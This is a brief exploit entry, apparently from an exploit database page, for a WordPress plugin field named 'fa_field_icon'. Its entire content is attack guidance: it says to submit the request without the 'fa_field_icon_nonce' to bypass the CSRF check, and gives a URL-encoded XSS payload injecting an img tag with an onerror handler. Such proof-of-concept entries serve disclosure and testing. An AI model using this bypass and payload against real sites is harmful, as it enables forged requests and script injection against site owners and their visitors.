## https://sploitus.com/exploit?id=WPEX-ID:9571540F-19ED-47CA-B9AE-20F2713F7FA4
Submit the request without the `fa_field_icon_nonce` to bypass the CSRF check.

For XSS, `fa_field_icon=%22%3e%3cimg%20src%20onerror%3dalert(%2fXSS%2f)%3e`